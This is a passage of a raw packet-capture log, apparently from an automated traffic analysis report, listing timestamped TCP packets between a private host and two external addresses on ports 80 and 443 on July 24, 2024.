                                                                                        Jul 24, 2024 07:14:19.386197090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.386197090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.387712002 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.387746096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.387772083 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.387799025 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.389236927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.389271975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.389306068 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.389332056 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.391339064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.391371965 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.391405106 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.391422033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.391422033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.391654015 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.392600060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.392635107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.392664909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.392693043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.393850088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.393883944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.393932104 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.393958092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.395191908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.395226955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.395278931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.395312071 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.396615982 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.396652937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.396684885 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.396714926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.397878885 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.397913933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.397947073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.397958994 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.398001909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.399216890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.399251938 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.399283886 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.399312973 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.400613070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.400648117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.400682926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.400711060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.401890993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.401925087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.401957989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.401985884 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.403130054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.403163910 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.403197050 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.403212070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.403234959 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.403250933 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.404352903 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.404387951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.404445887 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.405545950 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.405580044 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.405610085 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.405639887 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.406697035 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.406733036 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.406773090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.406810045 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.407857895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.407893896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.407938004 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.407938004 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.408921003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.408956051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.408986092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.408987045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.409006119 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.409022093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.409034014 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.409070015 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.410245895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.410283089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.410320997 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.410351038 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.411443949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.411478043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.411514044 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.411536932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.412106037 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.412162066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.412671089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.412704945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.412729979 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.412759066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.413712025 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.413747072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.413779974 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.413789988 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.413847923 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.413847923 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.414802074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.414835930 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.414891005 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.415936947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.415970087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.416001081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.416028976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.416811943 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.416843891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.416898966 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.416898966 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.417860031 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.417895079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.417947054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.418740988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.418776035 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.418809891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.418833971 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.418859959 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.419751883 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.419785023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.419817924 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.419847965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.420636892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.420670986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.420733929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.421502113 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.421535015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.421632051 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.421755075 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.422380924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.422416925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.422450066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.422463894 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.422481060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.422498941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.423232079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.423265934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.423327923 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.424072981 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.424107075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.424127102 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.424153090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.424931049 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.424964905 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.424989939 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.425043106 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.425754070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.425789118 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.425806999 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.425841093 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.426595926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.426630020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.426651001 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.426662922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.426680088 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.426784039 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.427402020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.427434921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.427458048 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.427529097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.428301096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.428335905 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.428354979 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.428388119 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.428994894 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.429028988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.429048061 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.429059029 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.429076910 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.429095984 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.429719925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.429754019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.429801941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.430478096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.430511951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.430543900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.430572033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.430598974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.431173086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.431241989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.435604095 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.435659885 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.435679913 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.435700893 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.435724020 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.435745955 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.435765028 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.435770035 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.435800076 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.435828924 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.435830116 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.436022997 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.437598944 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.437685013 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.437710047 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.437784910 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.437838078 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.458139896 CEST49713443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:19.458185911 CEST4434971313.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.467341900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.467415094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.467483997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.467524052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.467541933 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.467571974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.468146086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.468208075 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.468229055 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.468276978 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.469064951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.469100952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.469151020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.469151020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.469933033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.469966888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.470030069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.470863104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.470897913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.470931053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.470971107 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.470998049 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.471697092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.471733093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.471777916 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.471805096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.472600937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.472634077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.472672939 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.472700119 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.473469019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.473501921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.473524094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.473556995 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.474174023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.474206924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.474239111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.474247932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.474247932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.474320889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.474877119 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.474911928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.474936962 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.474963903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.475702047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.475737095 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.475758076 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.475781918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.476317883 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.476353884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.476408005 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.477003098 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.477039099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.477077007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.477077007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.477751017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.477786064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.477808952 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.477819920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.477832079 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.477868080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.478425980 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.478461027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.478532076 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.478532076 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.479084015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.479137897 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.479147911 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.479226112 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.479856968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.479891062 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.479926109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.479953051 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.480550051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.480586052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.480611086 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.480619907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.480652094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.480671883 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.481260061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.481292963 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.481314898 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.481343985 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.481905937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.481939077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.481957912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.481997013 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.482624054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.482656956 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.482691050 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.482718945 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.483614922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.483665943 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.483700037 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.483732939 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.483733892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.483751059 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.483788967 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.484786034 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.484858036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.484874964 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.484908104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.484977007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.485925913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.485960007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.485995054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.486016035 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.486035109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.486669064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.486702919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.486733913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.486747026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.486747026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.486864090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.487309933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.487344027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.487375975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.487402916 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.487411022 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.487443924 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.487463951 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.487915993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.487948895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.487982988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.487988949 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.488040924 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.488876104 CEST804971185.28.47.31192.168.2.6
